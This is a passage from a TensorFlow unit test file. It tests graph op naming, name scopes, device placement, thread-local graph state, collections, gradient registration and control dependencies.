g = ops.Graph()
self.assertEqual("foo_2", g.unique_name("foo_2"))
self.assertEqual("foo", g.unique_name("foo"))
self.assertEqual("foo_1", g.unique_name("foo"))
self.assertEqual("foo_3", g.unique_name("foo"))
def testUniqueNameCaseInsensitivity(self):
g = ops.Graph()
self.assertEqual("foo", g.unique_name("foo"))
self.assertEqual("Foo_1", g.unique_name("Foo"))
with g.name_scope("bar"):
self.assertEqual("bar/foo", g.unique_name("foo"))
with g.name_scope("Bar"):
self.assertEqual("Bar_1/foo", g.unique_name("foo"))
def testInvalidNameRaisesError(self):
g = ops.Graph()
with g.name_scope(""): # Should not raise
pass
with g.name_scope("foo/"): # Should not raise
with g.name_scope("_bar"): # Should not raise
pass
with self.assertRaises(ValueError):
with g.name_scope("foo:0"):
pass
with self.assertRaises(ValueError):
with g.name_scope("_bar"):
pass
def testEmptyScopeEdgeCases(self):
g = ops.Graph()
self.assertEqual("", g.get_name_scope())
with g.name_scope("") as scope:
self.assertEqual("", scope)
self.assertEqual("", g.get_name_scope())
with g.name_scope(None) as scope:
self.assertEqual("", scope)
self.assertEqual("", g.get_name_scope())
with g.name_scope("foo") as scope:
self.assertEqual("foo/", scope)
self.assertEqual("foo", g.get_name_scope())
with g.name_scope("") as scope:
self.assertEqual("", scope)
self.assertEqual("", g.get_name_scope())
with g.name_scope(None) as scope:
self.assertEqual("", scope)
self.assertEqual("", g.get_name_scope())
class NameTest(test_util.TensorFlowTestCase):
def testGenerateName(self):
g = ops.Graph()
op0 = g.create_op("TwoFloatOutputs", [], [dtypes.float32, dtypes.float32])
self.assertEqual("TwoFloatOutputs", op0.name)
self.assertEqual("TwoFloatOutputs:0", op0.outputs[0].name)
self.assertEqual("TwoFloatOutputs:1", op0.outputs[1].name)
op1 = g.create_op("FloatOutput", [], [dtypes.float32])
self.assertEqual("FloatOutput", op1.name)
self.assertEqual("FloatOutput:0", op1.outputs[0].name)
op2 = g.create_op("FloatOutput", [], [dtypes.float32])
self.assertEqual("FloatOutput_1", op2.name)
self.assertEqual("FloatOutput_1:0", op2.outputs[0].name)
op3 = g.create_op("FloatOutput", [], [dtypes.float32], name="my_op")
self.assertEqual("my_op", op3.name)
self.assertEqual("my_op:0", op3.outputs[0].name)
def testNameScope(self):
g = ops.Graph()
with g.name_scope("foo") as foo:
self.assertEqual("foo/", foo)
with g.name_scope("foo2") as foo2:
self.assertEqual("foo/foo2/", foo2)
with g.name_scope(None) as empty1:
self.assertEqual("", empty1)
with g.name_scope("foo3") as foo3:
self.assertEqual("foo3/", foo3)
with g.name_scope("") as empty2:
self.assertEqual("", empty2)
self.assertEqual("FloatOutput",
g.create_op("FloatOutput", [], [dtypes.float32]).name)
with g.name_scope("bar") as scope:
self.assertEqual("bar/FloatOutput",
g.create_op("FloatOutput", [], [dtypes.float32]).name)
self.assertEqual("bar/FloatOutput_1",
g.create_op("FloatOutput", [], [dtypes.float32]).name)
# If you use the value from "with .. as", that values is used as-is.
self.assertEqual(
"bar", g.create_op(
"FloatOutput", [], [dtypes.float32], name=scope).name)
with g.name_scope("baz") as scope:
with g.name_scope("quux"):
self.assertEqual("baz/quux/FloatOutput",
g.create_op("FloatOutput", [], [dtypes.float32]).name)
# If you use the value from the enclosing "with .. as", nothing is pushed.
with g.name_scope(scope):
self.assertEqual("baz/FloatOutput",
g.create_op("FloatOutput", [], [dtypes.float32]).name)
self.assertEqual(
"baz", g.create_op(
"FloatOutput", [], [dtypes.float32], name=scope).name)
self.assertEqual(
"trailing",
g.create_op(
"FloatOutput", [], [dtypes.float32], name="trailing/").name)
with g.name_scope("bar"):
self.assertEqual("bar_1/FloatOutput",
g.create_op("FloatOutput", [], [dtypes.float32]).name)
with g.name_scope("bar/"):
self.assertEqual("bar/FloatOutput_2",
g.create_op("FloatOutput", [], [dtypes.float32]).name)
class DeviceTest(test_util.TensorFlowTestCase):
def testNoDevice(self):
g = ops.Graph()
op = g.create_op("FloatOutput", [], [dtypes.float32])
self.assertDeviceEqual(None, op.device)
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput" }
""", gd)
def testEagerBackingDevice(self):
with context.eager_mode():
with ops.device("/device:CPU:0"):
t = constant_op.constant(1.0)
self.assertRegex(t.device, "/device:CPU:0")
self.assertRegex(t.backing_device, "/device:CPU:0")
def testDevicePartialString(self):
g = ops.Graph()
with g.device("/job:worker/replica:2"):
g.create_op("FloatOutput", [], [dtypes.float32])
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput"
device: "/job:worker/replica:2" }
""", gd)
def testDeviceFull(self):
g = ops.Graph()
with g.device(
pydev.DeviceSpec(
job="worker", replica=2, task=0, device_type="CPU",
device_index=3)):
g.create_op("FloatOutput", [], [dtypes.float32])
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput"
device: "/job:worker/replica:2/task:0/device:CPU:3" }
""", gd)
def testNesting(self):
g = ops.Graph()
with g.device("/job:worker/replica:2"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device("/job:worker/replica:3/task:0"):
g.create_op("FloatOutput", [], [dtypes.float32])
g.create_op("FloatOutput", [], [dtypes.float32])
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput"
device: "/job:worker/replica:2" }
node { name: "FloatOutput_1" op: "FloatOutput"
device: "/job:worker/replica:3/task:0" }
node { name: "FloatOutput_2" op: "FloatOutput"
device: "/job:worker/replica:2" }
""", gd)
def testNestingString(self):
g = ops.Graph()
with g.device("/job:worker/replica:2"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device("/job:worker/replica:3/task:0"):
g.create_op("FloatOutput", [], [dtypes.float32])
g.create_op("FloatOutput", [], [dtypes.float32])
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput"
device: "/job:worker/replica:2" }
node { name: "FloatOutput_1" op: "FloatOutput"
device: "/job:worker/replica:3/task:0" }
node { name: "FloatOutput_2" op: "FloatOutput"
device: "/job:worker/replica:2" }
""", gd)
def testNestingOverrideGpuCpu(self):
g = ops.Graph()
with g.device("/job:worker/replica:2/device:CPU:1"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device("/job:worker/replica:2/device:GPU:2"):
g.create_op("FloatOutput", [], [dtypes.float32])
g.create_op("FloatOutput", [], [dtypes.float32])
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput"
device: "/job:worker/replica:2/device:CPU:1" }
node { name: "FloatOutput_1" op: "FloatOutput"
device: "/job:worker/replica:2/device:GPU:2" }
node { name: "FloatOutput_2" op: "FloatOutput"
device: "/job:worker/replica:2/device:CPU:1" }
""", gd)
def testNestingWithMergeDeviceFunction(self):
g = ops.Graph()
with g.device(pydev.merge_device("/device:GPU:0")):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device(pydev.merge_device("/job:worker")):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device(pydev.merge_device("/device:CPU:0")):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device(pydev.merge_device("/job:ps")):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device(pydev.merge_device(None)):
g.create_op("FloatOutput", [], [dtypes.float32])
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput"
device: "/device:GPU:0" }
node { name: "FloatOutput_1" op: "FloatOutput"
device: "/job:worker/device:GPU:0" }
node { name: "FloatOutput_2" op: "FloatOutput"
device: "/job:worker/device:CPU:0" }
node { name: "FloatOutput_3" op: "FloatOutput"
device: "/job:ps/device:CPU:0" }
node { name: "FloatOutput_4" op: "FloatOutput"
device: "/job:ps/device:CPU:0" }
""", gd)
def testNestingWithDeviceStrings(self):
g = ops.Graph()
with g.device("/device:GPU:0"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device("/job:worker"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device("/device:CPU:0"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device("/job:ps"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device(""):
g.create_op("FloatOutput", [], [dtypes.float32])
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput"
device: "/device:GPU:0" }
node { name: "FloatOutput_1" op: "FloatOutput"
device: "/job:worker/device:GPU:0" }
node { name: "FloatOutput_2" op: "FloatOutput"
device: "/job:worker/device:CPU:0" }
node { name: "FloatOutput_3" op: "FloatOutput"
device: "/job:ps/device:CPU:0" }
node { name: "FloatOutput_4" op: "FloatOutput"
device: "/job:ps/device:CPU:0" }
""", gd)
def testNestingWithDeviceStringWildcard(self):
g = ops.Graph()
with g.device("/device:GPU:7"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device("/device:GPU:*"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device("/device:CPU:*"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device("/device:CPU:5"):
g.create_op("FloatOutput", [], [dtypes.float32])
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput"
device: "/device:GPU:7" }
node { name: "FloatOutput_1" op: "FloatOutput"
device: "/device:GPU:7" }
node { name: "FloatOutput_2" op: "FloatOutput"
device: "/device:CPU:*" }
node { name: "FloatOutput_3" op: "FloatOutput"
device: "/device:CPU:5" }
""", gd)
def testNestingErrorGraph(self):
g = ops.Graph()
scope = g.device("/device:GPU:8")
scope.__enter__()
with g.device("/device:GPU:9"):
with self.assertRaises(RuntimeError):
scope.__exit__(None, None, None)
def testNestingErrorEager(self):
with context.eager_mode():
scope = ops.device("/device:CPU:0")
scope.__enter__()
with ops.device(None):
with self.assertRaises(RuntimeError):
scope.__exit__(None, None, None)
def testNoneClearsDefault(self):
g = ops.Graph()
with g.device("/job:worker/replica:2/device:CPU:1"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device(None):
g.create_op("FloatOutput", [], [dtypes.float32])
g.create_op("FloatOutput", [], [dtypes.float32])
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput"
device: "/job:worker/replica:2/device:CPU:1" }
node { name: "FloatOutput_1" op: "FloatOutput" }
node { name: "FloatOutput_2" op: "FloatOutput"
device: "/job:worker/replica:2/device:CPU:1" }
""", gd)
def testNoneIgnoresOuterDeviceFunction(self):
g = ops.Graph()
with g.device(lambda op: "/job:worker/replica:2/device:CPU:1"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device(None):
g.create_op("FloatOutput", [], [dtypes.float32])
g.create_op("FloatOutput", [], [dtypes.float32])
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput"
device: "/job:worker/replica:2/device:CPU:1" }
node { name: "FloatOutput_1" op: "FloatOutput" }
node { name: "FloatOutput_2" op: "FloatOutput"
device: "/job:worker/replica:2/device:CPU:1" }
""", gd)
def _overwritingDeviceFunction(self, unused_op):
# This device function unconditionally overwrites the device of ops.
#
# NOTE(mrry): Writing device functions like this is not
# recommended. Instead, in most cases you should use
# `pydev.merge_device("/job:ps")` or simply `"/job:ps"` as the
# argument to `tf.device()` and the device component will be merged in.
return "/job:overwrite"
def testOverwritingBehavior(self):
g = ops.Graph()
with g.device(self._overwritingDeviceFunction):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device("/job:ps"): # Will be overwritten.
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device(pydev.merge_device("/job:ps")): # Will be overwritten.
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device(None): # Disables overwriting device function
with g.device("/job:ps"):
g.create_op("FloatOutput", [], [dtypes.float32])
with g.device(None): # Disables overwriting device function
with g.device(pydev.merge_device("/job:ps")):
g.create_op("FloatOutput", [], [dtypes.float32])
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput" op: "FloatOutput"
device: "/job:overwrite" }
node { name: "FloatOutput_1" op: "FloatOutput"
device: "/job:overwrite" }
node { name: "FloatOutput_2" op: "FloatOutput"
device: "/job:overwrite" }
node { name: "FloatOutput_3" op: "FloatOutput"
device: "/job:ps" }
node { name: "FloatOutput_4" op: "FloatOutput"
device: "/job:ps" }
""", gd)
class MultithreadedGraphStateTest(test_util.TensorFlowTestCase):
class TestThread(threading.Thread):
def __init__(self, graph, replica_id):
super(MultithreadedGraphStateTest.TestThread, self).__init__()
self._graph = graph
self._replica_id = replica_id
# This thread sets this event when it mutated the graph. The caller can
# wait for that.
self.has_mutated_graph = threading.Event()
# This thread waits for when it should continue. The caller can set this
# event.
self.should_continue = threading.Event()
def run(self):
# Mutate a graph's stack, then set `has_mutated_graph`, then wait for
# `should_continue`, then add an op to the graph affected by the graph's
# stack.
raise NotImplementedError("must be implemented in descendants")
def testDeviceFunctionStack(self):
class DeviceSettingThread(self.TestThread):
def run(self):
with g.device("/job:worker/replica:{}".format(self._replica_id)):
self.has_mutated_graph.set()
self.should_continue.wait()
self.should_continue.clear()
g.create_op(
"FloatOutput", [], [dtypes.float32],
name="FloatOutput_{}".format(self._replica_id))
g = ops.Graph()
# If `switch_to_thread` isn't called, then device placement of the ops
# below is not deterministic.
g.switch_to_thread_local()
threads = [DeviceSettingThread(g, i) for i in range(3)]
for t in threads:
t.start()
t.has_mutated_graph.wait()
t.has_mutated_graph.clear()
for t in threads:
t.should_continue.set()
t.join()
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "FloatOutput_0" op: "FloatOutput"
device: "/job:worker/replica:0" }
node { name: "FloatOutput_1" op: "FloatOutput"
device: "/job:worker/replica:1" }
node { name: "FloatOutput_2" op: "FloatOutput"
device: "/job:worker/replica:2" }
""", gd)
def testColocateWith(self):
class ColocatingThread(self.TestThread):
def __init__(self, graph, replica_id, op_to_colocate_with):
super(ColocatingThread, self).__init__(graph, replica_id)
self._op_to_colocate_with = op_to_colocate_with
def run(self):
with g.colocate_with(self._op_to_colocate_with):
self.has_mutated_graph.set()
self.should_continue.wait()
self.should_continue.clear()
g.create_op(
"FloatOutput", [], [dtypes.float32],
name="FloatOutput_{}".format(self._replica_id))
g = ops.Graph()
ops_to_colocate_with = []
for i in range(3):
with g.device("/job:worker/replica:{}".format(i)):
ops_to_colocate_with.append(
g.create_op(
"FloatOutput", [], [dtypes.float32],
name="ColocateWithMe_{}".format(i)))
# If `switch_to_thread` isn't called, then `device` and `attr` values for
# the ops below are not deterministic.
g.switch_to_thread_local()
threads = [
ColocatingThread(g, i, ops_to_colocate_with[i]) for i in range(3)
]
for t in threads:
t.start()
t.has_mutated_graph.wait()
t.has_mutated_graph.clear()
for t in threads:
t.should_continue.set()
t.join()
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "ColocateWithMe_0" op: "FloatOutput"
device: "/job:worker/replica:0" }
node { name: "ColocateWithMe_1" op: "FloatOutput"
device: "/job:worker/replica:1" }
node { name: "ColocateWithMe_2" op: "FloatOutput"
device: "/job:worker/replica:2" }
node { name: "FloatOutput_0" op: "FloatOutput"
device: "/job:worker/replica:0"
attr { key: "_class"
value { list {
s: "loc:@ColocateWithMe_0"}}}}
node { name: "FloatOutput_1" op: "FloatOutput"
device: "/job:worker/replica:1"
attr { key: "_class"
value { list {
s: "loc:@ColocateWithMe_1"}}}}
node { name: "FloatOutput_2" op: "FloatOutput"
device: "/job:worker/replica:2"
attr { key: "_class"
value { list {
s: "loc:@ColocateWithMe_2"}}}}
""", gd)
def testControlDependencies(self):
class DependingThread(self.TestThread):
def __init__(self, graph, replica_id, dependency_op):
super(DependingThread, self).__init__(graph, replica_id)
self._dependency_op = dependency_op
def run(self):
with g.control_dependencies([self._dependency_op]):
self.has_mutated_graph.set()
self.should_continue.wait()
self.should_continue.clear()
g.create_op(
"FloatOutput", [], [dtypes.float32],
name="FloatOutput_{}".format(self._replica_id))
g = ops.Graph()
dependency_ops = []
for i in range(3):
dependency_ops.append(
g.create_op(
"FloatOutput", [], [dtypes.float32],
name="ColocateWithMe_{}".format(i)))
# If `switch_to_thread` isn't called, then `input` values for the ops below
# are not deterministic.
g.switch_to_thread_local()
threads = [DependingThread(g, i, dependency_ops[i]) for i in range(3)]
for t in threads:
t.start()
t.has_mutated_graph.wait()
t.has_mutated_graph.clear()
for t in threads:
t.should_continue.set()
t.join()
gd = g.as_graph_def()
self.assertProtoEqualsVersion("""
node { name: "ColocateWithMe_0" op: "FloatOutput" }
node { name: "ColocateWithMe_1" op: "FloatOutput" }
node { name: "ColocateWithMe_2" op: "FloatOutput" }
node { name: "FloatOutput_0" op: "FloatOutput"
input: "^ColocateWithMe_0" }
node { name: "FloatOutput_1" op: "FloatOutput"
input: "^ColocateWithMe_1" }
node { name: "FloatOutput_2" op: "FloatOutput"
input: "^ColocateWithMe_2" }
""", gd)
def testNameStack(self):
class NameSettingThread(self.TestThread):
def run(self):
with g.name_scope("foo"):
op1 = g.create_op("FloatOutput", [], [dtypes.float32])
self.has_mutated_graph.set()
self.should_continue.wait()
self.should_continue.clear()
op2 = g.create_op("FloatOutput", [], [dtypes.float32])
self.result = (op1, op2)
g = ops.Graph()
threads = [NameSettingThread(g, i) for i in range(3)]
for t in threads:
t.start()
t.has_mutated_graph.wait()
t.has_mutated_graph.clear()
for t in threads:
t.should_continue.set()
t.join()
suffixes = ["", "_1", "_2"]
for t, s in zip(threads, suffixes):
self.assertEqual("foo" + s + "/FloatOutput", t.result[0].name)
self.assertEqual("foo" + s + "/FloatOutput_1", t.result[1].name)
class ObjectWithName(object):
def __init__(self, name):
self._name = name
@property
def name(self):
return self._name
class CollectionTest(test_util.TensorFlowTestCase):
def test_get_collections(self):
g = ops.Graph()
self.assertSequenceEqual(g.collections, [])
g.add_to_collection("key", 12)
g.add_to_collection("key", 15)
self.assertSequenceEqual(g.collections, ["key"])
g.add_to_collection("other", "foo")
self.assertSequenceEqual(sorted(g.collections), ["key", "other"])
self.assertSequenceEqual(
sorted(g.get_all_collection_keys()), ["key", "other"])
def test_add_to_collection(self):
g = ops.Graph()
g.add_to_collection("key", 12)
g.add_to_collection("other", "foo")
g.add_to_collection("key", 34)
# Note that only blank1 is returned.
g.add_to_collection("blah", 27)
blank1 = ObjectWithName("prefix/foo")
g.add_to_collection("blah", blank1)
blank2 = ObjectWithName("junk/foo")
g.add_to_collection("blah", blank2)
self.assertEqual([12, 34], g.get_collection("key"))
self.assertEqual([], g.get_collection("nothing"))
self.assertEqual([27, blank1, blank2], g.get_collection("blah"))
self.assertEqual([blank1], g.get_collection("blah", "prefix"))
self.assertEqual([blank1], g.get_collection("blah", ".*x"))
# Make sure that get_collection() returns a first-level
# copy of the collection, while get_collection_ref() returns
# the original list.
other_collection_snapshot = g.get_collection("other")
other_collection_ref = g.get_collection_ref("other")
self.assertEqual(["foo"], other_collection_snapshot)
self.assertEqual(["foo"], other_collection_ref)
g.add_to_collection("other", "bar")
self.assertEqual(["foo"], other_collection_snapshot)
self.assertEqual(["foo", "bar"], other_collection_ref)
self.assertEqual(["foo", "bar"], g.get_collection("other"))
self.assertTrue(other_collection_ref is g.get_collection_ref("other"))
# Verify that getting an empty collection ref returns a modifiable list.
empty_coll_ref = g.get_collection_ref("empty")
self.assertEqual([], empty_coll_ref)
empty_coll = g.get_collection("empty")
self.assertEqual([], empty_coll)
self.assertFalse(empty_coll is empty_coll_ref)
empty_coll_ref2 = g.get_collection_ref("empty")
self.assertTrue(empty_coll_ref2 is empty_coll_ref)
# Add to the collection.
empty_coll_ref.append("something")
self.assertEqual(["something"], empty_coll_ref)
self.assertEqual(["something"], empty_coll_ref2)
self.assertEqual([], empty_coll)
self.assertEqual(["something"], g.get_collection("empty"))
empty_coll_ref3 = g.get_collection_ref("empty")
self.assertTrue(empty_coll_ref3 is empty_coll_ref)
def test_add_to_collections_uniquify(self):
g = ops.Graph()
g.add_to_collections([1, 2, 1], "key")
# Make sure "key" is not added twice
self.assertEqual(["key"], g.get_collection(1))
def test_add_to_collections_from_list(self):
g = ops.Graph()
g.add_to_collections(["abc", "123"], "key")
self.assertEqual(["key"], g.get_collection("abc"))
self.assertEqual(["key"], g.get_collection("123"))
def test_add_to_collections_from_tuple(self):
g = ops.Graph()
g.add_to_collections(("abc", "123"), "key")
self.assertEqual(["key"], g.get_collection("abc"))
self.assertEqual(["key"], g.get_collection("123"))
def test_add_to_collections_from_generator(self):
g = ops.Graph()
def generator():
yield "abc"
yield "123"
g.add_to_collections(generator(), "key")
self.assertEqual(["key"], g.get_collection("abc"))
self.assertEqual(["key"], g.get_collection("123"))
def test_add_to_collections_from_set(self):
g = ops.Graph()
g.add_to_collections(set(["abc", "123"]), "key")
self.assertEqual(["key"], g.get_collection("abc"))
self.assertEqual(["key"], g.get_collection("123"))
def test_add_to_collections_from_string(self):
g = ops.Graph()
g.add_to_collections("abc", "key")
self.assertEqual(["key"], g.get_collection("abc"))
def test_default_graph(self):
with ops.Graph().as_default():
ops.add_to_collection("key", 90)
ops.add_to_collection("key", 100)
# Collections are ordered.
self.assertEqual([90, 100], ops.get_collection("key"))
def test_defun(self):
with context.eager_mode():
@eager_function.defun
def defun():
ops.add_to_collection("int", 1)
ops.add_to_collection("tensor", constant_op.constant(2))
@eager_function.defun
def inner_defun():
self.assertEqual(ops.get_collection("int"), [1])
three = ops.get_collection("tensor")[0] + ops.get_collection("int")[0]
ops.add_to_collection("int", 2)
self.assertEqual(ops.get_collection("int"), [1, 2])
ops.add_to_collection("foo", "bar")
self.assertEqual(ops.get_collection("foo"), ["bar"])
return three
self.assertEqual(ops.get_collection("int"), [1])
three = inner_defun()
self.assertEqual(ops.get_collection("int"), [1])
self.assertEqual(ops.get_collection("foo"), [])
return three
three = defun()
self.assertEqual(three.numpy(), 3)
ops.NotDifferentiable("FloatOutput")
@ops.RegisterGradient("CopyOp")
def _CopyGrad(op, x_grad): # pylint: disable=invalid-name
_ = op
return x_grad
@ops.RegisterGradient("copy_override")
def _CopyOverrideGrad(op, x_grad): # pylint: disable=invalid-name
_ = op
return x_grad
class RegistrationTest(test_util.TensorFlowTestCase):
@test_util.run_deprecated_v1
def testRegisterGradients(self):
x = test_ops.float_output()
y = test_ops.copy_op(x)
fn = ops.get_gradient_function(y.op)
self.assertEqual(_CopyGrad, fn)
def testOverrideGradients(self):
g = ops.Graph()
with g.as_default():
x = test_ops.float_output()
with g.gradient_override_map({"CopyOp": "copy_override"}):
y = test_ops.copy_op(x)
fn = ops.get_gradient_function(y.op)
self.assertEqual(_CopyOverrideGrad, fn)
def testNonExistentOverride(self):
g = ops.Graph()
with g.as_default():
x = test_ops.float_output()
with g.gradient_override_map({"CopyOp": "unknown_override"}):
y = test_ops.copy_op(x)
with self.assertRaisesRegex(LookupError, "unknown_override"):
ops.get_gradient_function(y.op)
class ComparisonTest(test_util.TensorFlowTestCase):
def testMembershipAllowed(self):
g = ops.Graph()
t1 = _apply_op(g, "FloatOutput", [], [dtypes.float32], name="myop1")
t2 = _apply_op(g, "FloatOutput", [], [dtypes.float32], name="myop2")
self.assertTrue(isinstance(t1, ops.Tensor))
self.assertTrue(isinstance(t2, ops.Tensor))
self.assertTrue(t1 in [t1])
self.assertTrue(t1 not in [t2])
class ControlDependenciesTest(test_util.TensorFlowTestCase):
@test_util.run_deprecated_v1
def testBasic(self):
g = ops.Graph()
with g.as_default():
# Creating unregistered ops with _apply_op() doesn't work with the C API
# TODO(skyewm): address this more consistently. Possible solutions are
# to use registered ops in all tests, create a way to register ops in
# Python tests, or conditionally disable the op registration check in
# the C API.
a = constant_op.constant(1.0)
b = constant_op.constant(1.0)
with g.control_dependencies([a]):
c = constant_op.constant(1.0)
d = array_ops.identity(b)
e = array_ops.identity(c)
self.assertEqual(c.op.control_inputs, [a.op])
self.assertEqual(d.op.control_inputs, [a.op])
# e should be dominated by c.
self.assertEqual(e.op.control_inputs, [])
@test_util.run_in_graph_and_eager_modes
def testEager(self):
def future():
future.calls += 1
return constant_op.constant(2.0)
future.calls = 0
if context.executing_eagerly():
a = constant_op.constant(1.0)
b = future
with ops.control_dependencies([a, b]):
c = constant_op.constant(3.0)
self.assertEqual(future.calls, 1)
else:
g = ops.Graph()
with g.as_default():
a = constant_op.constant(1.0)
b = future()
with g.control_dependencies([a, b]):
c = constant_op.constant(3.0)
self.assertEqual(c.op.control_inputs, [a.op, b.op])
self.assertEqual(future.calls, 1)
def testBasicWithConversion(self):
g = ops.Graph()
a = _apply_op(g, "FloatOutput", [], [dtypes.float32])
class ConvertibleObj(object):
def _as_graph_element(self):
return a
with g.control_dependencies([ConvertibleObj()]):
c = _apply_op(g, "FloatOutput", [], [dtypes.float32])
self.assertEqual(c.op.control_inputs, [a.op])
def testNested(self):
g = ops.Graph()
a_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
with g.control_dependencies([a_1, a_2, a_3, a_4]):
b_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
with g.control_dependencies([a_1]):
with g.control_dependencies([a_2]):
with g.control_dependencies([a_3]):
with g.control_dependencies([a_4]):
b_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
self.assertItemsEqual([a_1.op, a_2.op, a_3.op, a_4.op],
b_1.op.control_inputs)
self.assertItemsEqual(b_1.op.control_inputs, b_2.op.control_inputs)
def testClear(self):
g = ops.Graph()
a_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
with g.control_dependencies([a_1]):
with g.control_dependencies([a_2]):
with g.control_dependencies(None):
with g.control_dependencies([a_3]):
with g.control_dependencies([a_4]):
# deps [a_3, a_4]
b_3_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
# deps = [a_3]
b_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
# deps back to None
b_none = _apply_op(g, "FloatOutput", [], [dtypes.float32])
# deps back to [a_1, a_2]
b_1_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
# deps back to [a_1]
b_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
with g.control_dependencies(None):
# deps are None again
b_none2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
self.assertItemsEqual([a_3.op, a_4.op], b_3_4.op.control_inputs)
self.assertItemsEqual([a_3.op], b_3.op.control_inputs)
self.assertItemsEqual([], b_none.op.control_inputs)
self.assertItemsEqual([a_1.op, a_2.op], b_1_2.op.control_inputs)
self.assertItemsEqual([a_1.op], b_1.op.control_inputs)
self.assertItemsEqual([], b_none2.op.control_inputs)
def testComplex(self):
g = ops.Graph()
# Usage pattern:
# * Nodes a_i are constants defined at the outermost scope, and are used
# as control inputs for the ith nested scope.
# * Nodes b_i are defined as Mul(a_3, a_4) at each scope.
# * Nodes c_i are defined as Mul(a_1, b_1) at each scope.
# * Nodes d_i are defined as Mul(b_i, c_i) at each scope.
# * Nodes e_i are defined as Mul(e_i-1, e_i-1) at each scope i > 1.
a_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
with g.control_dependencies([a_1]):
b_1 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_3, a_4],
[dtypes.float32])
c_1 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_1, b_1],
[dtypes.float32])
d_1 = _apply_op(g, "TwoFloatInputsFloatOutput", [b_1, c_1],
[dtypes.float32])
e_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
with g.control_dependencies([a_2]):
b_2 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_3, a_4],
[dtypes.float32])
c_2 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_1, b_1],
[dtypes.float32])
d_2 = _apply_op(g, "TwoFloatInputsFloatOutput", [b_2, c_2],
[dtypes.float32])
e_2 = _apply_op(g, "TwoFloatInputsFloatOutput", [e_1, e_1],
[dtypes.float32])
with g.control_dependencies([a_3]):
b_3 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_3, a_4],
[dtypes.float32])
c_3 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_1, b_1],
[dtypes.float32])
d_3 = _apply_op(g, "TwoFloatInputsFloatOutput", [b_3, c_3],
[dtypes.float32])
e_3 = _apply_op(g, "TwoFloatInputsFloatOutput", [e_2, e_2],
[dtypes.float32])
with g.control_dependencies([a_4]):
b_4 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_3, a_4],
[dtypes.float32])
c_4 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_1, b_1],
[dtypes.float32])
d_4 = _apply_op(g, "TwoFloatInputsFloatOutput", [b_4, c_4],
[dtypes.float32])
e_4 = _apply_op(g, "TwoFloatInputsFloatOutput", [e_3, e_3],
[dtypes.float32])
self.assertItemsEqual([a_1.op], b_1.op.control_inputs)
self.assertItemsEqual([a_1.op, a_2.op], b_2.op.control_inputs)
self.assertItemsEqual([a_1.op, a_2.op], b_3.op.control_inputs)
self.assertItemsEqual([a_1.op, a_2.op], b_4.op.control_inputs)
self.assertItemsEqual([], c_1.op.control_inputs)
self.assertItemsEqual([a_2.op], c_2.op.control_inputs)
